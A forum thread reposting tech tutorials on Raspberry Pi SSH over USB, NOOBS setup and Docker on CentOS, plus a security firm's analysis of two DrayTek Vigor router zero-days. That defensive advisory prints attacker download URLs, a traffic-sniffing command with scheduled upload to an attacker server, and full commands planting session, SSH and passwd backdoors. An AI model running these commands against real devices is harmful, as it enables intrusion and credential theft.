    This article covers setting up a Pi Zero or Pi Zero W for headless SSH access over USB using Windows 10. The Mac OS version of these instructions can be found here: SSH into Pi Zero over USB (Mac).

    When you first get a Pi Zero the big question is – how do you access it? You can get a powered USB hub, USB keyboard, USB mouse and HDMI adapter. Or you can just plug it into your computer directly and access it over USB using ssh.

    These instructions are for a Raspbian Stretch image that I downloaded from here:

    https://www.raspberrypi.org/downloads/raspbian/

    I’m using the lite image (no desktop) version 4.9 from March 13, 2018. I’ve also done this with an older desktop version.

    Step 1. Edit the Image

    To access the Pi Zero over USB you have to edit the image first.

    • If you need to burn a new image to an SD card, download the Etcher tool from https://etcher.io
    • If you have the SD card in your Pi Zero, power it down and remove it
    • Put the SD card into an adapter and plug it into your computer
    • NOTE: Windows gets confused when you plug in a Raspbian image and it may try to get you to format it - always hit Cancel
    • In Windows 10 the SD card should appear in File Explorer as a drive named “boot”
    • If you just burned a new image using Etcher you may need to pull the SD card out and plug it back in again for File Explorer to see it
    • Open the SD card and explore the contents in File Explorer
    • You should now see the contents of the root of your Raspbian boot image

    Step 2. Enable ssh

    There was a security update to the Raspbian images. Now, to enable ssh by default, you have to place an empty file named ssh (no extension) in the root of the card. (A command-line alternative is shown after the steps below.)

    1. Run Notepad

    • In a new file put in one space and nothing more
    • Click File / Save As …
    • Be sure to set Save as type to All Files (so the file is NOT saved with a .txt extension)
    • Call the file ssh and save it
    • Close the file
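
    Alternatively, the empty file can be created in one step from a Command Prompt (a sketch; the drive letter is an assumption and depends on where the boot partition is mounted):

    type nul > E:\ssh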

    Step 3. Download Notepad++

    Windows Notepad can’t handle the Unix-style line endings in the Linux-based files that we need to edit next. To edit them you need to download a free tool called Notepad++.

    • Install the 64-bit version.

    Step 4. Edit config.txt

    1. In the root folder of the SD card, open config.txt in Notepad++ (right click on the file and there should be an edit option)

    • Append this line to the bottom of that file: dtoverlay=dwc2
    • Save the file

    Step 5. Edit cmdline.txt

    1. In the root folder of the SD card, open cmdline.txt in Notepad++

    • After rootwait, append this text, leaving only one space between rootwait and the new text (otherwise it might not be parsed correctly): modules-load=dwc2,g_ether
    • If there was any text after the new text make sure that there is only one space between that text and the new text
    • Save the file

    On a fresh image that has never been booted, you may see extra text after rootwait. But if you boot the pi from the disk at least once, that extra text may go away. That is why you must put the new text directly after rootwait - so it doesn’t get accidentally deleted.

    Step 6. Install Bonjour

    You can find Raspberry Pis on your network using their hostname followed by .local (example: raspberrypi.local). But to do that in Windows you have to install the Bonjour service first.

    If you have iTunes installed on Windows you probably don’t have to do this, since iTunes bundles the Bonjour service. Otherwise, download Bonjour Print Services for Windows v2.0.2 from Apple and run the installer.
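
    Once the Pi is up (see Step 7 below), you can verify that Bonjour name resolution works from a Command Prompt:

    ping raspberrypi.local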

    Step 7. Boot the Pi Zero

    1. Put the SD card into the Pi Zero

    • Plug a Micro-USB cable into the data/peripherals port (the one closest to the center of the board – see picture above)
    • You do NOT need to plug in external power – it will get it from your computer
    • Plug the other end into a USB port on your computer
    • Give the Pi Zero plenty of time to bootup (can take as much as 90 seconds – or more)

    Step 8. Install Putty

    If you already have PuTTY installed, skip to the next step.

    1. Browse to: https://www.putty.org

    • Download the 64-bit MSI (Windows Installer)
    • Open it to run the installer (if asked for permission, click Yes)
    • Select: Add shortcut to PuTTY on the Desktop

    Step 9. Login over USB using Putty

    This part assumes that ssh is enabled for your image and that the default user is pi with a password of raspberry.

    1. Launch Putty

    • If this is a new image, set the Host Name (or IP address) field to raspberrypi.local (if not use your-pi-host-name.local)
    • By default the Port should be set to 22 and Connection type should be set to SSH
    • Click Open
    • If you see a Security Alert select Yes
    • A new terminal window should appear prompting you for a user name
    • For user name on a new image enter: pi
    • For a new image the default password is: raspberry

    Congratulations! You can now access your Pi Zero with just a USB cable.

    Step 10. Access the network

    By default a Pi attached to a Windows 10 machine via USB cable can’t access the network (unless the Pi itself has already been set up for wireless or network access).

    To allow the Pi to access the network through the Windows machine, do the following:

    1. Under Control Panel launch Network and Sharing Center

    • In my case my laptop is connected through Wi-Fi, so I selected the entry for my network
    • Click Properties
    • Click the Sharing tab
    • Check Allow other network users to connect through this computer’s Internet connection
    • Click OK and then Close
    • In the terminal window opened through Putty, type ping www.google.com and verify that you are connected to the Internet
  3. Fri May 8 09:26:08 2020
    Men in Black started the conversation SSH into Pi Zero over USB.

    [attachment:5eb4c33cd6aa5]

    UPDATE: This article now covers the new security change that disables ssh access by default. The Raspbian image version has also been updated.

    This article covers setting up a Pi Zero for SSH USB access using a Mac. The Windows instructions can be found here: Headless Pi Zero SSH Access over USB (Windows).

    When you first get a Pi Zero the big question is – how do you access it? You can get a powered USB hub, USB keyboard, USB mouse and HDMI adapter. Or you can just plug it into your computer directly and access it over USB using ssh.

    These instructions are for a Raspbian Buster image that I downloaded from here:

    https://www.raspberrypi.org/downloads/raspbian/

    I’m using the lite image (no desktop) version 4.19 from June 20, 2019. I’ve also done this with an older desktop version and Jessie Lite.

    Here are my notes from walking through the process. You can find links to the original instructions in the References section below.

    Step 1. Edit the image

    To access the Pi Zero over USB you have to edit the image first.

    • If you have the SD card in your Pi Zero, power it down and remove it
    • Put the SD card in an adapter and plug it into your computer
    • On a Mac the SD card should appear on your desktop
    • Open the SD card icon to explore the contents

    Step 2. Access the micro SD card from the command line

    At a command line do the following:

    ls -ls /Volumes/

    You should see something like this:

    total 13
    8 lrwxr-xr-x  1 root   admin     1 Jul 28 09:41 Macintosh HD -> /
    5 drwxrwxrwx@ 1 mitch  staff  2560 Jul 28 11:47 boot

    The volume named boot should be the SD card with the Raspbian image on it.

    Now do this:

    ls -ls /Volumes/boot

    You should now see the contents of the root of your Raspbian boot image.

    Step 3. Enable ssh

    There was a security update to the Raspbian images. Now to enable ssh by default you have to do the following:

    touch /Volumes/boot/ssh

    This will write an empty file to the root of your Raspbian image. That will enable ssh on startup.

    Step 4. Edit config.txt

    • In the root folder of the SD card, open config.txt (/Volumes/boot/config.txt) in a text editor
    • Append this line to the bottom of it: dtoverlay=dwc2
    • Save the file
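
    If you prefer the terminal, the same append can be done in one command (assuming the card is mounted at /Volumes/boot):

    echo 'dtoverlay=dwc2' >> /Volumes/boot/config.txt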

    Step 5. Edit cmdline.txt

    • In the root folder of the SD card, open cmdline.txt (/Volumes/boot/cmdline.txt) in a text editor
    • After rootwait, append this text leaving only one space between rootwait and the new text (otherwise it might not be parsed correctly): modules-load=dwc2,g_ether
    • If there was any text after the new text make sure that there is only one space between that text and the new text
    • Save the file
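
    Again, this edit can be done from the terminal; a sed one-liner splices the text in directly after rootwait (a sketch using the BSD sed that ships with macOS; double-check the result afterwards):

    sed -i '' 's/rootwait/rootwait modules-load=dwc2,g_ether/' /Volumes/boot/cmdline.txt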

    On a fresh image that has never been booted, you may see extra text after rootwait. But if you boot the pi from the disk at least once, that extra text may go away. That is why you must put the new text directly after rootwait - so it doesn’t get accidentally deleted.

    Step 6. Boot the Pi Zero

    • Put the SD card into the Pi Zero
    • Plug a Micro-USB cable into the data/peripherals port (the one closest to the center of the board – see picture above)
    • You do NOT need to plug in external power – it will get it from your computer
    • Plug the other end into a USB port on your computer
    • Give the Pi Zero plenty of time to bootup (can take as much as 90 seconds – or more)
    • You can monitor the RNDIS/Ethernet Gadget status in the System Preferences / Network panel (note that the IP address listed is not the host)

    Step 7. Login over USB

    This part assumes that ssh is enabled for your image and that the default user is pi with a password of raspberry.

    • Open up a terminal window
    • Run the following commands:
       
    ssh-keygen -R raspberrypi.local
    ssh pi@raspberrypi.local
    • If the pi won’t respond, press Ctrl-C and try the last command again
    • If prompted with a warning just hit enter to accept the default (Yes)
    • Type in the password – by default this is raspberry

    Congratulations! You can now access your Pi Zero with just a USB cable.

  4. Fri May 8 09:24:43 2020
    Men in Black started the conversation How to Install an OS on a Raspberry Pi .

    [attachment:5eb4c16a66891]

    There are several Raspberry Pi models to choose from, but the Raspberry Pi 3 Model B+ is the newest, fastest, and easiest to use for beginners. The Raspberry Pi 3 Model B+ comes with Wi-Fi and Bluetooth already installed, so besides the initial setup you don’t need to install additional drivers or Linux dependencies. The Raspberry Pi Zero and Zero W are smaller and require less power, which makes them better suited for portable projects. Generally, it is easier to start off using a Raspberry Pi 3 and move on to the Raspberry Pi Zero when you find more use-case scenarios for Raspberry Pi.

    Items you need

    Here are all the items you need to get started with the Raspberry Pi:

    1. A Raspberry Pi 3 Model B+
    2. A micro USB power supply with at least 2.5 amps (any cell phone charger using micro USB works)
    3. A micro SD card with at least 8 GB of space. 16 GB and 32 GB micro SD cards are the perfect size as they provide enough space for the operating system you are installing, plus plenty of free space for other files you want to add at a later time.
    4. A USB mouse and USB keyboard for initial setup
    5. A TV or computer screen that you can connect to via HDMI

    There are other optional extras, including a case for your Raspberry Pi, an Ethernet cable, and headphones or speakers. A case is important to protect your Raspberry Pi from drops; I dropped a Raspberry Pi and managed to crack the board entirely, forcing me to purchase another one. A case is not required, but it is good to have just “in case.” Larger Raspberry Pi models, excluding the Raspberry Pi Zero and Zero W, have a standard Ethernet port to connect directly to your router. For connecting the Raspberry Pi Zero to the internet, you need a USB-to-Ethernet adaptor. Thankfully, the Raspberry Pi 3 Model B+ and Pi Zero W can connect wirelessly to your Wi-Fi. I still connect the Ethernet cable from my Raspberry Pi to the router just in case there are any internet connectivity issues. I have not found a use for adding sound to my Raspberry Pi yet, but if I need to output sound there is a 3.5mm headphone jack available on the Raspberry Pi 3 Model B+.

    Once you have all the needed components, you need to set up your microSD card. The microSD card contains the operating system and the files needed for the Raspberry Pi to operate. Without a microSD card, your Raspberry Pi will not function.

    List of Operating Systems

    Here is a list of all of the operating systems that you can install and run reliably on a Raspberry Pi.

    The Raspberry Pi Organization prefers that you use Raspbian, which is a Linux-based operating system built specifically for the Raspberry Pi. There is also NOOBS, which is an easier route for beginners; we will use NOOBS to install on a microSD card for this example.

    Download NOOBS

    Here are the steps you need to follow to install and run NOOBS on a microSD card.

    Go to the Raspberry Pi downloads page.
    Click the NOOBS box where indicated by the red arrow.

    [attachment:5eb4c24d0354b]

    Download the NOOBS.zip file as indicated by the green arrow.

    [attachment:5eb4c25e2f200]

    Save NOOBS.zip in a place where you can easily access it later. Once the microSD card is properly formatted, you will need to extract NOOBS from the zip archive and copy it to the microSD card.

    Format the microSD card

    Now, you need to prepare the microSD card. The best way to prepare the microSD card is to use SD Formatter, the official SD card formatting tool provided by the SD Association. It is available for Windows or Mac and can be downloaded from here.

    Once installed, use SD Formatter to format your SD card. If your computer has a microSD card slot, you can put the card in there to format it. Otherwise you will need to use a USB microSD card reader. Once formatted, you are ready to extract and copy the files from NOOBS.zip to your microSD card.

    Here’s what you need to do to extract the files from NOOBS.zip and copy the files to your microSD card.

    1. Find the NOOBS.zip file that you downloaded.
    2. Right-click NOOBS.zip and choose to extract the files.
    3. Once the files are extracted, copy all the files to your microSD card as shown.

    [attachment:5eb4c29a4c9fc]
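
    On macOS or Linux, the extract-and-copy can also be done from a terminal in one step. A sketch, where the card’s mount point is an assumption that will differ on your system:

    unzip NOOBS.zip -d /Volumes/<your-sd-card>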

    Once the files are copied, eject the microSD card from your computer. Now it’s time to put the microSD card in the Raspberry Pi, connect the USB keyboard, the USB mouse, and the HDMI cable to a supported TV or monitor, and lastly connect the power source and power it up.

    Connect everything to the Raspberry Pi

    [attachment:5eb4c2d76c5dd]

    As a general rule, I always connect the power source to the Raspberry Pi last, because the OS is on the microSD card and there might be issues registering peripherals if they are connected after the OS boots from the microSD card. That’s another thing to keep in mind: the Raspberry Pi doesn’t have a power switch. You can install a power switch and a portable battery supply too, but those are projects for another time. The only way to power the Raspberry Pi on and off is via the OS, or by disconnecting the power source.

    Once you power up your Raspberry Pi, you should see two lights. Red indicates that there is power, and the green light should be blinking, indicating that the Raspberry Pi is reading the NOOBS files on the microSD card. You will then be brought to the Raspbian desktop to finish the setup process. You’re all done!

  5. 5 months ago
    Sat Mar 28 12:56:27 2020
    Men in Black started the conversation Two zero days are Targeting DrayTek Broadband CPE Devices.

    [attachment:5e7ee474dde24]

    Background

    Since December 4, 2019, the 360Netlab Threat Detection System has observed two different attack groups using two 0-day vulnerabilities in DrayTek[1] Vigor enterprise routers and switch devices to conduct a series of attacks, including eavesdropping on devices’ network traffic, running SSH services on high ports, creating system backdoor accounts, and even creating a specific malicious Web Session backdoor.

    On December 25, 2019, due to the highly malicious nature of the attack, we disclosed on Twitter[2] [3] the ongoing 0-day attack IoC without mentioning the vendor name or product lines. We also provided more details to some national CERTs.

    On February 10, 2020, the manufacturer DrayTek issued a security bulletin[4], which fixed the vulnerability and released the latest firmware, version 1.5.1. (Here we actually have an easter egg we might talk about later.)

    Vulnerability analysis

    With the help of the 360 Firmware Total system[5], we were able to perform vulnerability research. The two 0-day command injection points are keyPath and rtick, located in /www/cgi-bin/mainfunction.cgi, and the corresponding web server program is /usr/sbin/lighttpd.

    keyPath command injection vulnerability analysis

    Vulnerability type: unauthorized remote command execution vulnerability
    Vulnerability details: Two account password transmission methods are supported by the DrayTek devices: plain text and RSA encrypted transmission.
    For RSA encrypted transmission, the interaction logic is:

    1. The web front end uses the RSA public key to encrypt the username and password, and uses a keyPath field to specify the file suffix of the RSA private key to initiate a login request;
    2. When the formLogin() function in the /www/cgi-bin/mainfunction.cgi detects that the keyPath field is not empty, the decryption starts;
    3. formLogin() uses the keyPath as input to craft the following path /tmp/rsa/private_key_<keyPath> as the RSA private key;
    4. formLogin() performs Base64 decode on the username and password fields, writes them to the file /tmp/rsa/binary_login, and executes the following command to decrypt the username and password:
       openssl rsautl -inkey '/tmp/rsa/private_key_<keyPath>' -decrypt -in /tmp/rsa/binary_login

    5. Finally, the formLogin() function takes the decrypted user name and password to continue the verification.

    The issue here is that keyPath does not have very strong input control, which makes unauthorized remote command execution possible.

    Bug fix: In version 1.5.1, the keyPath field length is limited to 30 characters, and the content must be hexadecimal characters.

    [attachment:5e7ee59c05d34]

    rtick command injection vulnerability analysis

    Vulnerability Type: unauthorized remote command execution vulnerability
    Vulnerability details: When /www/cgi-bin/mainfunction.cgi needs to access a verification code, it calls the function formCaptcha(). That function does not check the incoming timestamp from rtick, and calls /usr/sbin/captcha directly to generate the CAPTCHA image <rtick>.gif, which makes command injection possible.

    Bug fix: In version 1.5.1, the vendor limits the rtick field to use only [0-9].

    [attachment:5e7ee5d601177]

    Analysis of wild 0-day attacks

    Attack Group A

    1. Attacker A uses the keyPath command injection vulnerability to download and execute the http://103.82.143.51:58172/vig/tcpst1 script, which then further downloads and executes the following scripts:

    http://103.82.143.51:58172/vi1
    http://103.82.143.51:58172/vig/mailsend.sh1

    2. The script /etc/mailsend.sh is used to eavesdrop on all network interfaces of the DrayTek Vigor network device, listening on ports 21, 25, 143, and 110. The tcpdump command /usr/sbin/tcpdump -i any -n -nn port 21 or port 25 or port 143 or port 110 -s 65535 -w /data/firewall.pcap & runs in the background, and a crontab is in place to upload the captured packets to https://103.82.143.51:58443/uploLSkciajUS.php every Monday, Wednesday, and Friday at 0:00.

    Attack group B

    1. Attacker B uses the rtick command injection vulnerability to create 2 sets of Web Session backdoors that never expire in the file /var/session.json:

    json -f /var/session.json set 7:CBZD1SOMBUHVAF34TPDGURT9RTMLRUDK username=sadmin level=7 lasttime=0 updatetime=0 | sed -i s/""\""0\""""/""0""/g /var/session.json | sed -i s/""\""7\""""/""7""/g /var/session.json
    json -f /var/session.json set 7:R8GFPS6E705MEXZWVQ0IB1SM7JTRVE57 username=sadmin level=7 lasttime=0 updatetime=0 | sed -i s/""\""0\""""/""0""/g /var/session.json | sed -i s/""\""7\""""/""7""/g /var/session.json

    2. Attacker B further creates SSH backdoors on TCP/22335 and TCP/32459:

    /usr/sbin/dropbear -r /etc/config/dropbear_rsa_host_key -p 22335 | iptables -I PPTP_CTRL 1 -p tcp --dport 22335 -j ACCEPT
    /usr/sbin/dropbear -r /etc/config/dropbear_rsa_host_key -p 32459 | iptables -I PPTP_CTRL 1 -p tcp --dport 32459 -j ACCEPT

    3. A system backdoor account wuwuhanhan:caonimuqin is added as well.

    sed -i /wuwuhanhan:/d /etc/passwd ; echo 'wuwuhanhan:$1$3u34GCgO$9Pklx3.3OVwbIBja/CzZN/:500:500:admin:/tmp:/usr/bin/clish' >> /etc/passwd ; cat /etc/passwd;
    sed -i /wuwuhanhan:/d /etc/passwd ; echo 'wuwuhanhan:$1$sbIljOP5$vacGOLqYAXcw3LWek9aJQ.:500:500:admin:/tmp:/usr/bin/clish' >> /etc/passwd ; cat /etc/passwd;

    Web Session backdoor

    When we studied the 0-day PoC, we noticed that when the session parameter updatetime is set to 0, the DrayTek Vigor network device never logs out unless the device is rebooted (aka Auto-Logout: Disable).

    [attachment:5e7ee69e17857]

    Timeline

    2019/12/04 We discovered ongoing attacks using the DrayTek Vigor 0-day keyPath vulnerability
    2019/12/08 We reached out to a channel to report the vulnerability (but only later found out that it did not work out)
    2019/12/25 We disclosed on twitter the IoC and provided more details to some national CERTs.
    2020/01/28 We discovered ongoing attacks using the DrayTek Vigor 0-day rtick vulnerability
    2020/02/01 MITRE published CVE-2020-8515
    2020/02/10 DrayTek released a security bulletin and the latest firmware fix.

    Affected firmware list

    Vigor2960           <  v1.5.1
    Vigor300B           <  v1.5.1
    Vigor3900           <  v1.5.1
    VigorSwitch20P2121  <= v2.3.2
    VigorSwitch20G1280  <= v2.3.2
    VigorSwitch20P1280  <= v2.3.2
    VigorSwitch20G2280  <= v2.3.2
    VigorSwitch20P2280  <= v2.3.2

    Suggestions

    We recommend that DrayTek Vigor users check and update their firmware in a timely manner, and check whether there is a tcpdump process, SSH backdoor account, Web Session backdoor, etc. on their systems.
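
    As a minimal sketch of such a check, run from a shell on the device (assuming BusyBox-style tools are available there), one could look for the indicators described above:

    ps | grep tcpdump
    grep wuwuhanhan /etc/passwd
    ls -l /var/session.json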

    We recommend that the following IoCs be monitored and blocked on networks where applicable.

    MD5

    7c42b66ef314c466c1e3ff6b35f134a4
    01946d5587c2774418b5a6c181199099
    d556aa48fa77040a03ab120b4157c007

    URL

    http://103.82.143.51:58172/vig/tcpst1
    http://103.82.143.51:58172/vi1
    http://103.82.143.51:58172/vig/mailsend.sh1
    https://103.82.143.51:58443/LSOCAISJDANSB.php
    https://103.82.143.51:58443/uploLSkciajUS.php

    Scanner IP

    103.82.143.51       	Korea                   ASN136209           	Korea Fast Networks 
    178.151.198.73      	Ukraine             	ASN13188            	Content Deli

    https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/

  6. 6 months ago
    Fri Mar 13 07:58:01 2020
    Men in Black started the conversation How To Install and Use Docker Compose on CentOS 7.

    [attachment:5e6ad832a0a85]

    Introduction

    Docker is a great tool for automating the deployment of Linux applications inside software containers, but to really take full advantage of its potential it’s best if each component of your application runs in its own container. For complex applications with a lot of components, orchestrating all the containers to start up and shut down together (not to mention talk to each other) can quickly become unwieldy.

    The Docker community came up with a popular solution called Fig, which allowed you to use a single YAML file to orchestrate all your Docker containers and configurations. This became so popular that the Docker team decided to build Docker Compose on the Fig source (Fig itself has since been deprecated). Docker Compose makes it easier for users to orchestrate the processes of Docker containers, including starting up, shutting down, and setting up intra-container linking and volumes.

    In this tutorial, you will install the latest version of Docker Compose to help you manage multi-container applications, and will explore the basic commands of the software.

    Docker and Docker Compose Concepts

    Using Docker Compose requires a combination of a bunch of different Docker concepts in one, so before we get started let’s take a minute to review the various concepts involved. If you’re already familiar with Docker concepts like volumes, links, and port forwarding then you might want to go ahead and skip on to the next section.

    Docker Images

    Each Docker container is a local instance of a Docker image. You can think of a Docker image as a complete Linux installation. Usually a minimal installation contains only the bare minimum of packages needed to run the image. These images use the kernel of the host system, but since they are running inside a Docker container and only see their own file system, it’s perfectly possible to run a distribution like CentOS on an Ubuntu host (or vice-versa).

    Most Docker images are distributed via the Docker Hub, which is maintained by the Docker team. Most popular open source projects have a corresponding image uploaded to the Docker Registry, which you can use to deploy the software. When possible, it’s best to grab “official” images, since they are guaranteed by the Docker team to follow Docker best practices.

    Communication Between Docker Images

    Docker containers are isolated from the host machine, meaning that by default the host machine has no access to the file system inside the Docker container, nor any means of communicating with it via the network. This can make configuring and working with the image running inside a Docker container difficult.

    Docker has three primary ways to work around this. The first and most common is to have Docker specify environment variables that will be set inside the Docker container. The code running inside the Docker container will then check the values of these environment variables on startup and use them to configure itself properly.
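
    For example, a containerized database is typically configured this way. A minimal sketch, assuming the official mariadb image (the variable name is specific to that image):

       # All configuration is passed in as environment variables at startup
       docker run -d -e MYSQL_ROOT_PASSWORD=mysecretpassword mariadb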

    Another commonly used method is a Docker data volume. Docker volumes come in two flavors — internal and shared.

    Specifying an internal volume just means that for a folder you specify for a particular Docker container, the data will be persisted when the container is removed. For example, if you wanted to make sure your log files persisted you might specify an internal /var/log volume.

    A shared volume maps a folder inside a Docker container onto a folder on the host machine. This allows you to easily share files between the Docker container and the host machine.
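
    As a rough sketch of the two flavors (my-image is a hypothetical image name):

       # Internal volume: /var/log lives in Docker-managed storage and persists
       docker run -v /var/log my-image

       # Shared volume: ~/logs on the host is mapped onto /var/log in the container
       docker run -v ~/logs:/var/log my-image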

    The third way to communicate with a Docker container is via the network. Docker allows communication between different Docker containers via links, as well as port forwarding, allowing you to forward ports from inside the Docker container to ports on the host server. For example, you can create a link to allow your WordPress and MariaDB Docker containers to talk to each other and use port-forwarding to expose WordPress to the outside world so that users can connect to it.
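
    A minimal sketch of that WordPress/MariaDB setup, using the legacy --link flag and port forwarding (the container names and password are illustrative):

       # WordPress reaches MariaDB through the link alias "mysql"
       docker run -d --name db -e MYSQL_ROOT_PASSWORD=mysecretpassword mariadb
       # Port 80 inside the container is forwarded to port 80 on the host
       docker run -d --name blog --link db:mysql -p 80:80 wordpress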

    Prerequisites

    To follow this article, you will need the following:

    • CentOS 7 server, set up with a non-root user with sudo privileges

    Once these are in place, you will be ready to follow along.

    Step 1 — Installing Docker Compose

    In order to get the latest release, follow the lead of the Docker docs and install Docker Compose from the binary in Docker’s GitHub repository.

    Check the current release and if necessary, update it in the command below:

        sudo curl -L "https://github.com/docker/compose/releases/download/1.23.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose

    Next, set the permissions to make the binary executable:

       sudo chmod +x /usr/local/bin/docker-compose

    Then, verify that the installation was successful by checking the version:

       docker-compose --version

    This will print out the version you installed:

    Output
    docker-compose version 1.23.2, build 1110ad01

    Now that you have Docker Compose installed, you’re ready to run a “Hello World” example.

    Step 2 — Running a Container with Docker Compose

    The public Docker registry, Docker Hub, includes a simple “Hello World” image for demonstration and testing. It illustrates the minimal configuration required to run a container using Docker Compose: a YAML file that calls a single image.

    First, create a directory for our YAML file:

       mkdir hello-world

    Then change into the directory:

       cd hello-world

    Now create the YAML file using your favorite text editor. This tutorial will use Vi:

       vi docker-compose.yml

    Enter insert mode by pressing i, then put the following contents into the file:

    docker-compose.yml
    
    my-test:
      image: hello-world

    The first line will be part of the container name. The second line specifies which image to use to create the container. When you run the command docker-compose up it will look for a local image by the name specified, hello-world.

    With this in place, hit ESC to leave insert mode. Enter :x then ENTER to save and exit the file.

    To look manually at images on your system, use the docker images command:

        docker images

    When there are no local images at all, only the column headings display:

    Output
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE

    Now, while still in the ~/hello-world directory, execute the following command to create the container:

       docker-compose up

    The first time we run the command, if there’s no local image named hello-world, Docker Compose will pull it from the Docker Hub public repository:

    Output
    Pulling my-test (hello-world:)...
    latest: Pulling from library/hello-world
    1b930d010525: Pull complete
    . . .

    After pulling the image, docker-compose creates a container, attaches, and runs the hello program, which in turn confirms that the installation appears to be working:

    Output
    . . .
    Creating helloworld_my-test_1...
    Attaching to helloworld_my-test_1
    my-test_1 | 
    my-test_1 | Hello from Docker.
    my-test_1 | This message shows that your installation appears to be working correctly.
    my-test_1 | 
    . . .

    It will then print an explanation of what it did:

    Output
    . . .
    my-test_1  | To generate this message, Docker took the following steps:
    my-test_1  |  1. The Docker client contacted the Docker daemon.
    my-test_1  |  2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
    my-test_1  |     (amd64)
    my-test_1  |  3. The Docker daemon created a new container from that image which runs the
    my-test_1  |     executable that produces the output you are currently reading.
    my-test_1  |  4. The Docker daemon streamed that output to the Docker client, which sent it
    my-test_1  |     to your terminal.
    . . .

    Docker containers only run as long as the command is active, so once hello finished running, the container stops. Consequently, when you look at active processes, the column headers will appear, but the hello-world container won’t be listed because it’s not running:

        docker ps
    
    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES

    Use the -a flag to show all containers, not just the active ones:

        docker ps -a
    
    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES
    50a99a0beebd        hello-world         "/hello"            3 minutes ago       Exited (0) 3 minutes ago                       hello-world_my-test_1

    Now that you have tested out running a container, you can move on to exploring some of the basic Docker Compose commands.

    Step 3 — Learning Docker Compose Commands

    To get you started with Docker Compose, this section will go over the general commands that the docker-compose tool supports.

    The docker-compose command works on a per-directory basis. You can have multiple groups of Docker containers running on one machine — just make one directory for each container and one docker-compose.yml file for each directory.
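
    For instance, two independent application groups might be laid out like this (the directory names are hypothetical):

       mkdir -p ~/wordpress ~/api      # one directory per container group
       # each directory holds its own docker-compose.yml
       cd ~/wordpress && docker-compose up -d
       cd ~/api && docker-compose up -d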

    So far you’ve been running docker-compose up on your own, from which you can use CTRL-C to shut the container down. This allows debug messages to be displayed in the terminal window. This isn’t ideal though; when running in production it is more robust to have docker-compose act more like a service. One simple way to do this is to add the -d option when you up your session:

       docker-compose up -d

    docker-compose will now fork to the background.

    To show your group of Docker containers (both stopped and currently running), use the following command:

       docker-compose ps -a

    If a container is stopped, the State will be listed as Exited, as shown in the following example:

    Output
            Name            Command   State    Ports
    ------------------------------------------------
    hello-world_my-test_1   /hello    Exit 0        

    A running container will show Up:

    Output
         Name              Command          State        Ports      
    ---------------------------------------------------------------
    nginx_nginx_1   nginx -g daemon off;   Up      443/tcp, 80/tcp 

    To stop all running Docker containers for an application group, issue the following command in the same directory as the docker-compose.yml file that you used to start the Docker group:

       docker-compose stop

    Note: docker-compose kill is also available if you need to shut things down more forcefully.

    In some cases, Docker containers will store their old information in an internal volume. If you want to start from scratch you can use the rm command to fully delete all the containers that make up your container group:

       docker-compose rm

    If you try any of these commands from a directory other than the directory that contains a Docker container and .yml file, it will return an error:

    Output
    ERROR:
            Can't find a suitable configuration file in this directory or any
            parent. Are you in the right directory?
    
            Supported filenames: docker-compose.yml, docker-compose.yaml

    This section has covered the basics of how to manipulate containers with Docker Compose. If you needed to gain greater control over your containers, you could access the filesystem of the Docker container and work from a command prompt inside your container, a process that is described in the next section.

    Step 4 — Accessing the Docker Container Filesystem

    In order to work on the command prompt inside a container and access its filesystem, you can use the docker exec command.

    The “Hello World” example exits after it runs, so to test out docker exec, start a container that will keep running. For the purposes of this tutorial, use the Nginx image from Docker Hub.

    Create a new directory named nginx and move into it:

        mkdir ~/nginx
        cd ~/nginx

    Next, make a docker-compose.yml file in your new directory and open it in a text editor:

       vi docker-compose.yml

    Next, add the following lines to the file:

    [b]~/nginx/docker-compose.yml[/b]
    
    nginx:
      image: nginx

    Save the file and exit. Start the Nginx container as a background process with the following command:

       docker-compose up -d

    Docker Compose will download the Nginx image and the container will start in the background.

    Now you will need the CONTAINER ID for the container. List all of the containers that are running with the following command:

       docker ps

    You will see something similar to the following:

    Output of `docker ps`
    CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS               NAMES
    b86b6699714c        nginx               "nginx -g 'daemon of…"   20 seconds ago      Up 19 seconds       80/tcp              nginx_nginx_1

    If you wanted to make a change to the filesystem inside this container, you’d take its ID (in this example b86b6699714c) and use docker exec to start a shell inside the container:

       docker exec -it b86b6699714c /bin/bash

    The -t option opens up a terminal, and the -i option makes it interactive. /bin/bash opens a bash shell to the running container.

    You will then see a bash prompt for the container similar to:

    root@b86b6699714c:/#

    From here, you can work from the command prompt inside your container. Keep in mind, however, that unless you are in a directory that is saved as part of a data volume, your changes will disappear as soon as the container is restarted. Also, remember that most Docker images are created with very minimal Linux installs, so some of the command line utilities and tools you are used to may not be present.
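
    For example, if you wanted files under the web root to survive restarts, you could declare that path as a volume in the compose file. A minimal sketch, assuming the image's default web root of /usr/share/nginx/html:

    nginx:
      image: nginx
      volumes:
        - /usr/share/nginx/html

    Anything written under that path would then be stored in a data volume instead of the container's ephemeral filesystem.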

  7. Fri Mar 13 07:43:52 2020
    Men in Black started the conversation How To Install and Use Docker on CentOS 7.

    Introduction

    Docker is an application that makes it simple and easy to run application processes in a container, which are like virtual machines, only more portable, more resource-friendly, and more dependent on the host operating system. For a detailed introduction to the different components of a Docker container, check out The Docker Ecosystem: An Introduction to Common Components.

    There are two methods for installing Docker on CentOS 7. One method involves installing it on an existing installation of the operating system. The other involves spinning up a server with a tool called Docker Machine that auto-installs Docker on it.

    In this tutorial, you’ll learn how to install and use it on an existing installation of CentOS 7.

    Prerequisites

    • 64-bit CentOS 7 Droplet
    • Non-root user with sudo privileges. A CentOS 7 server set up using Initial Setup Guide for CentOS 7 explains how to set this up.

    Note: Docker requires a 64-bit version of CentOS 7 as well as a kernel version equal to or greater than 3.10. The default 64-bit CentOS 7 Droplet meets these requirements.

    All the commands in this tutorial should be run as a non-root user. If root access is required for the command, it will be preceded by sudo. Initial Setup Guide for CentOS 7 explains how to add users and give them sudo access.

    Step 1 — Installing Docker

    The Docker installation package available in the official CentOS 7 repository may not be the latest version. To get the latest and greatest version, install Docker from the official Docker repository. This section shows you how to do just that.

    But first, let’s update the package database:
    Now run this command. It will add the official Docker repository, download the latest version of Docker, and install it:

       curl -fsSL https://get.docker.com/ | sh

    After installation has completed, start the Docker daemon:

       sudo systemctl start docker

    Verify that it’s running:

       sudo systemctl status docker

